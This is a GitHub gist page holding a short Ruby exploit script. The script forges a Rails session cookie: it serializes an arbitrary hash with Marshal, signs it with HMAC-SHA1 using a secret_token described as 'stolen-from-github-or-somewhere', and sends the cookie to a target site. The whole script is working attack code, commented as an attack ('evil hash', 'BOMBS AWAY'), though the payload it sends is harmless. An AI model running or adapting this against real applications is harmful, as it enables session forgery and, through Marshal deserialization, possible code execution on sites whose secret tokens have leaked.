Skip to content

Instantly share code, notes, and snippets.

@robert
Created July 22, 2013 08:22
Show Gist options
  • Save robert/6052207 to your computer and use it in GitHub Desktop.
Save robert/6052207 to your computer and use it in GitHub Desktop.
require "net/http"
require "uri"
secret_token = "stolen-from-github-or-somewhere"
# Construct your evil hash
my_evil_session_hash = {
"ive_made_a_huge_mistake" => true
}
# Serialize your hash
marshal_dump = Marshal.dump(my_evil_session_hash)
# Base64 encode this dump
unescaped_cookie_value = Base64.encode64(marshal_dump)
# Escape any troublesome characters and remove line breaks altogether
escaped_cookie_value = CGI.escape(unescaped_cookie_value).gsub("%0A", "")
# Calculate the signature using the HMAC digest of the secret_token and the escaped cookie value. Replace %3D with equals signs.
cookie_signature = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret_token, escaped_cookie_value.gsub("%3D", "="))
# Construct your evil cookie by concatenating the value with the signature
my_evil_cookie = "_MyApp_session=#{unescaped_cookie_value}--#{cookie_signature}"
# BOMBS AWAY
url = URI.parse("http://myapp.com/") # Make sure you have a trailing / if you are sending to the root path
req = Net::HTTP::Get.new(url.path)
req.add_field("Cookie", my_evil_cookie)
res = Net::HTTP.new(url.host, url.port).start do |http|
http.request(req)
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment